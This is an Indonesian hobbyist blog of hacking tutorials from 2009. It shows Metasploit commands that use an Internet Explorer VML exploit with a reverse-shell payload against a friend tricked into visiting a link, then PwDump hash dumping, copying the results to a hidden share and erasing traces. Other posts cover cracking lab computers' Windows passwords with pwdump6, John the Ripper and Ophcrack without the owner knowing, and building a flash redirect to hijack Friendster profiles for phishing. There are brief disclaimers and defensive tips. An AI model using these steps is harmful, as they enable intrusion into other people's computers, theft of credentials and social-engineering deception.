Kamis, 29 Januari 2009

Friendster Palsu

fren kalian mungkin butuh bca ini .perlu denk.apalagi buat kalian yang suka n maniak banget sama friendster.untuk jaga jaga gitu.nih contoh kasusnya :

Beberapa hari belakangan ini profile di Friendster saya tidak bisa dibuka. Apabila mengakses profile saya di FS, maka akan muncul halaman login seakan terjadi error pada FS dan meminta anda login kembali. Berikut tampilannya :

fspalsu.png

Apabila diperhatikan, alamat situs itu bukan http://www.friendster.com, melainkan http://www.friendster.co.nr! Mungkin bagi kebanyakan pengguna akan serta merta memasukkan email dan passwordnya. Tapi setelah saya liat2.. ternyata itu adalah situs Friendster Palsu! Halaman itu bertujuan untuk mengambil email dan password kita dan mengirimkannya ke tempat lain menggunakan script PHP dari alamat “http://209.190.16.82/bh.php” (bisa dilihat pada source code HTML-nya).

Setelah saya teliti.. ternyata hal ini bisa terjadi akibat testimonial yang menggunakan flash atau sejenisnya (saya lupa.. soalnya udah diapus) yang bisa me-redirect halaman profile kita ke alamat lain. Misalnya yang tadinya ingin membuka alamat http://www.friendster.com/chaidirabadi akan di-redirect menjadi http://www.friendster.co.nr.

Setelah saya cek menggunakan ARIN WHOIS, IP 209.190.16.82 (IP dari script yg digunakan) menghasilkan informasi berikut :

Search results for: 209.190.16.82

OrgName:    Columbus Network Access Point, Inc.
OrgID: CNAP
Address: 50 W, Broad St, Suite 627
City: Columbus
StateProv: OH
PostalCode: 43215
Country: US

Sedangkan friendster.com memiliki IP 209.11.168.242 dengan informasi berikut :

Search results for: 209.11.168.242

OrgName:    Globix Corporation
OrgID: GLBX
Address: 139 Centre Street
City: New York
StateProv: NY
PostalCode: 10013
Country: US

Jadi sangat jelas bahwa script PHP itu BUKAN script dari Friendster.

Untuk itu.. saya menghimbau kepada temen2 yang sudah pernah memasukkan email dan password melalui halaman Friendster Palsu untuk SEGERA mengganti password. Sedangkan bagi yang belum pernah.. berhati-hatilah. Dan jangan lupa.. bagi yang mengkases Friendster melalui tempat umum (warnet atau lab), ada baiknya untuk menghapus cookies pada browser terlebih dahulu.

*Thx to fira for ur help me to recognize this problem. :-D

Belajar Hack Yuck! (3) - Hack Windows XP SP2

Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.

Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

main1.JPG

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan tampak seperti gambar berikut :

exploit1.JPG

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack da Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

pwdump.JPG

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1

Klo berhasil akan tampak pada gambar berikut.

dump1.JPG

Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

clean.JPG

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking…..

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

Reference :

http://www.metasploit.com

Hack Windows XP (SP2) Passwords

Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun seperti Cain, L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdump6 dan john the ripper. Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi :-D .
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :

Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.

Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file

Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.

Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. :-D . Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari sini atau download dari mirror situs saya disini.

1. Jalankan CMD (Run->cmd)

2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)

D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1

pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.

3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :

ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.

Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :

D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)

Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.

Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. :-D Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!
Referensi :

[1]. http://studenti.unina.it/~ncuomo/syskey

Thanks to fizzgig for you great tools, pwdump6 (http://www.foofus.net/fizzgig/pwdump)! I’ve been looking for this tools for a log time ago! Thanks dude!! and Thanks to pen-test@securityfocus.com!

Update : Cara yang lebih mudah dapat ditemukan di Hack Windows XP Password dengan Ophcrack :-D

Hack Windows XP Password dengan Ophcrack

Sebelumnya saya pernah membuat tutorial mengenai Hack Windows XP (SP2) Passwords menggunakan pwdump6. Namun, cara tersebut mengharuskan user dengan status admin agar dapat ‘dump’ file HASH dari Windows. Sekarang saya akan menyampaikan cara lain untuk ‘cracking’ password Windows XP (semua versi) dengan menggunakan Ophcrack.

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry) :-D . Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.

Intinya hampir sama dengan cara kerja pwdump6, namun karena Ophcrack menggunakan linux LiveCD sehingga dapat langsung mount file sistem Windows tanpa perlu login ke Windows serta membaca file Hash (windows\system32\config) dan melakukan dump ke file text biasa yang kemudian dapat langsung di crack. Dan hebatnya, tidak perlu Tools seperti JTR lagi, karena crack dilakukan dengan Ophcrack menggunakan Rainbow Table dan memberikan hasil yang sangat cepat.

Ok.. langsung aja kita praktek, tapi sebelumnya pasang disclaimer dulu ah… biar bisa ‘lepas’ tanggung jawab kalau tutorial ini disalahgunakan oleh pihak lain :-P

Disclaimer:

This document was written in the interest of education and care of awareness for unaware people. The author cannot be held responsible for how the topics discussed in this document are applied.

Lets Begin

Pertama kali anda harus mendownload file ISO Ophcrack LiveCD dari sini. Lalu burn ke dalam CD. Dan selanjutnya boot Komputer ‘target’ dari Ophcrack LiveCD, maka akan tampak seperti ini :

boot.JPG

Tekan Enter dan biarkan proses Booting berlangsung. Ophcrack akan otomatis masuk ke windows manager menggunakan fluxbox dan langsung menjalankan Ophcrack. Proses pertama adalah mendapatkan file HASH dari partisi yang berisi file Windows kemudian di dump ke file /tmp/ophcrack.tmp

dump.JPG

Kemudian tunggu beberapa saat untuk melakukan cracking.

Saya melakukan pengujian menggunakan spesifikasi sebagai berikut : Prosessor AMD +2000 1.6 Ghz, Memori 256 Mb dan dijalankan menggunakan VM-Ware.

Lalu saya menggunakan password yang sangat sederhana, yaitu ‘password123′ dan ‘password’. Hasilnya, Ophcrack mampu menebak kedua password dengan tepat dan hanya membutuhkan waktu 1 Menit!!

Lalu saya coba untuk mengkombinasikan huruf, angka dan simbol dengan memberikan password : ‘p4ssw0rd’ dan ‘p4ssw0rd~!@#’. Hasilnya, Ophcrack mampu menebak ‘p4ssw0rd’ dengan waktu 8 menit dan tidak dapat menemukan ‘p4ssw0rd~!@#’.

hasil.JPG

Selain menggunakan CD, dengan sedikit modifikasi, Ophcrack juga dapat dijalankan melalui USB Flashdisk. Caranya dengan menginstall SLAX ke dalam USB Flashdisk dan menambahkan modul ophcrack di SLAX serta menyalin Rainbow Tables ke dalam USB, maka Ophcrack LiveUSB sudah dapat dijalankan :-D

Selain itu, untuk mempersingkat waktu, kita dapat mengambil file HASH terlebih dahulu yang terletak di /tmp/ophcrack.tmp kemudian baru di crack di tempat lain tanpa perlu menunggu lagi di komputer target. :-D

Saran

Ibarat pisau bermata dua, Ophcrack dapat menjadi sangat berguna ketika ada seseorang yang lupa password Windows dan ingin me-recovery password dengan cepat dan mudah. Namun disisi lain, Ophcrack dapat juga menjadi ’senjata’ ampuh bagi cracker untuk menjebol Windows dengan cara yang sangat mudah dan cepat. Bahkan kabarnya Ophcrack ini merupakan tools yang paling cepat untuk crack password Windows. Untuk itu ada beberapa hal yang dapat mengurangi resiko agar password komputer kita tidak ‘dibobol’ dengan mudah.

1. Setting password BIOS komputer dan atur urutan boot agar tidak melakukan booting pertama kali dari CD atau USB.

2. Gunakan password yang terdiri dari huruf+angka+simbol agar tidak mudah di crack.

Oph… Crack!! :-D

NB : Cara lain menggunakan ophcrack di Windows dapat dilihat disini

hack friendster

tau g` seh kalo fs tuh bisa di hack juga loh

Dalam artikel saya sebelumnya mengenai Friendster palsu, teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :

apt-get install libming-util

Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :

getURL("http://www.contoh.com");

misalkan seperti berikut :

getURL("http://chaidir.wordpress.com");

Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :

chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as

Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju http://chaidir.wordpress.com.

Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.

Jangan mengirimkan testimonial ini keteman anda, karena profile teman anda tidak akan bisa diakses!

Caranya masukkan kode berikut :


27CDB6E-AE6D-11cf-96B8-444553540000′ codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0′ width=’400′ height=’250′>http://numpang.com/out.swf‘ />http://numpang.com/out.swf‘ quality=’high’ pluginspage=’http://www.macromedia.com/go/getflashplayer’ type=’application/x-shockwave-flash’ width=’400′ height=’250′ allowScriptAccess=”never”>

Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.

Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.

‘Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.

Pesan buat anak2 ABG pecinta Friendster :

Dan buat anak2 ABG yang sering ke warnet hanya untuk ber-Friendster ria.. apakah tidak ada aktivitas lain di internet selain ber-Friendsteran?! Sangat sayang sekali jika kamu ke warnet cuman liat cowo2 ato cewe2 yang friendsterGenic (keren di friendster doang!) Mendingan belajar cari informasi yang menarik atau belajar apapun dari Internet. Atau lebih baik lagi klo kamu buat buat blog sendiri. Selain belajar nulis, kamu kan juga bisa nambah temen baru. Rugi loh klo bayar 3000 - 4000 perak cuman buat ngeliat Friendster doang, mendingan buat beli bakso!

Referensi :

http://ezinearticles.com/?Redirect-Your-MySpace-Traffic-With-Flash&id=364276

Sekilas info :

ternyata http://www.friendster.co.nr dah diubah toh… hihihi :-D .



hacking buat pemula

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.

Pro dan Kontra Hacking

Pro

Kontra

Etika Hacking

Semua informasi adalah free

Jika semua informasi adalah free, maka tidak ada ladi privacy

Aspek Security

Intrusion adalah ilustrasi kelemahan sistem

Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci

Idle Machines

Hacking hanya pada idle machines

idle machines milik siapa ?

science education

hanya membobol tapi tidak merusak

“hacker wannabe” berpotensi sangat besar untuk merusak

Okeh, sekarang waktunya melakukan aksi…


1. Fase Persiapan

~ Mengumpulkan informasi sebanyak-banyaknya

- Secara Aktif : - portscanning

- network mapping

- OS Detection

- application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat

- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)

- via internet registries (informasi domain, IP Addres)

- Website yang menjadi terget



2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->

$gcc -o exploit exploit.c

$./exploit

# hostname (# tanda mendapatkan akses root)

remote host -> $gcc -o exploit exploit.c

$./exploit -t www.target.com

# (klo beruntung mendapatkan akes root)

~ Brute Force

- Secara berulang melakukan percobaan otentifikasi.

- Menebak username dan password.

- Cracking password file

~ Social Engineering

- Memperdayai user untuk memeberi tahu Username dan password

- Intinya ngibulin user….



3. Fase Setelah Eksekusi

~ Menginstall backdoor, trojans, dan rootkit

~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin

~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!



Referensi :

-Hacking and Defense, Jim Geovedi, negative@magnesium.net

-Network Defense, Jim Geovedi, negative@magnesium.net

ni tutorial buat jadi hacker

buka aja web dibawah ini

A Buffer Overflow Study - Attacks and Defenses (2002).pdf 470kbs
http://rapidshare.de/files/2305162/A_Buffer_Overflow_Study_-_Attacks_and_Defe...

Amazon Hacks - (O'reilly-August 2003).chm 2.83megs
http://rapidshare.de/files/1001242/O_Reilly_-_Amazon_Hacks__2003___TeaM_LiB__...

Computer Vulnerability(March 9 2000).pdf 390kbs
http://rapidshare.de/files/2305190/Computer_Vulnerability_March_9_2000_.pdf.html

Crackproof Your Software(No Starch-2002).pdf 7.17megs
http://rapidshare.de/files/2305234/Crackproof_Your_Software_No_Starch-2002_.p...

Credit Card Visa Hack(Cambridge Lab-2003).pdf 223kbs
http://rapidshare.de/files/2305239/Credit_Card_Visa_Hack_Cambridge_Lab-2003_....

Google Hacking for Penetration Tester (Syngress-2005).pdf 13.7megs
http://rapidshare.de/files/2317399/Google_Hacking_for_Penetration_Tester__Syn...

Hack Attacks Revealed- A Complete Reference with Custom Security Hacking Toolkit (Wiley-2001).pdf 8.25megs
http://rapidshare.de/files/2317485/Hack_Attacks_Revealed-_A_Complete_Reference

Hack IT Security Through Penetration Testing (Addison Wesley-2002).chm 4.96megs
http://rapidshare.de/files/2317600/Hack_IT__Security_Through_Penetration_Test...

Hack Proofing Your Identity in the Information Age (Syngress-2002).pdf 9.11megs
http://rapidshare.de/files/2317737/Hack_Proofing_Your_Identity_in_the_Informa...

Hack Proofing Your Network - Internet Tradecraft (Syngress-2000).pdf 2.94megs
http://rapidshare.de/files/2329542/Hack_Proofing_Your_Network_-_Internet_Trad...

Hacker Disassembling Uncovered (A List- 2003).chm 4.72megs
http://rapidshare.de/files/2329577/Hacker_Disassembling_Uncovered__A_List-_20...

Hackers Beware (NewRiders -2002).pdf 4.62megs
http://rapidshare.de/files/2329607/Hackers_Beware__NewRiders_-2002_.pdf.html

Hackers Delight( Addison Wesley- 2003 ).chm 2.11megs
http://rapidshare.de/files/2329626/Hackers_Delight__Addison_Wesley-_2003__.ch...

Hacker's Desk Reference.pdf 744kbs
http://rapidshare.de/files/2329629/Hacker_s_Desk_Reference.pdf.html

Hacking Exposed- Network Security Secrets and Solutions (MCGraw-Hill-2001).pdf 8.04megs
http://rapidshare.de/files/2369818/Hacking_Exposed-_Network_Security_Secrets_...

Hacking Exposed- Web Applications (MCGraw-Hill-2002).pdf 7.76megs
